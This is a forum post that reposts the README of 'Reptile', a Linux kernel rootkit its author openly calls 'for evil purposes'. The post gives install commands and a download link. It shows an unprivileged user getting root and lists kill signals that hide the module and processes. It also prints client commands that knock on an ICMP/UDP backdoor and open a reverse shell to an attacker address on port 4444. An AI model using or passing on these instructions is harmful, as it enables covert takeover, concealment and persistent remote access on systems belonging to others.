OKQL 1272 Report post Posted October 29, 2017 Reptile Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the Please login or register to see this link. . Features Give root to unprivileged users Hide files and directories Hide files contents Hide processes Hide himself Boot persistence Heaven's door - A ICMP/UDP port-knocking backdoor Client to knock on heaven's door Install apt-get install linux-headers-$(uname -r) https://github.com/f0rb1dd3n/Reptile.git cd Reptile ./installer.sh install Usage Binaries will be copied to /reptile folder, that will be hidden by Reptile. Getting root privileges hax@Debian:~$ id uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner) hax@Debian:~$ /reptile/r00t You got super powers! root@Debian:/home/hax# id uid=0(root) gid=0(root) groups=0(root) Hiding Hide/unhide reptile module: kill -50 0 Hide/unhide process: kill -49 <PID> Hide files contents: all content between the tags will be hidden Example: #<reptile> content to hide #</reptile> Knocking on heaven's door Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client: Knock Knock on Heaven's Door Writen by: F0rb1dd3n Usage: ./knock_on_heaven <args> -x protocol (ICMP/UDP) -s Source IP address (You can spoof) -t Target IP address -p Source Port -q Target Port -d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>" -l Launch listener [!] ICMP doesn't need ports ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l Disclaimer Some functions of this module is based on another rootkits. Please see the references! References “LKM HACKING”, The Hackers Choice (THC), 1999; Please login or register to see this link. Please login or register to see this link. Please login or register to see this link. “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997; Please login or register to see this link. Contribuiting I am open to receiving contributions. If you can contribute with this project, discuss the contribution via e-mail or open an issue, fork the project and make a pull request. I will evaluate pull requests and merge to the project. Download Please login or register to see this link. or git clone https://github.com/f0rb1dd3n/Reptile.git Source: Please login or register to see this link. Share this post Link to post Share on other sites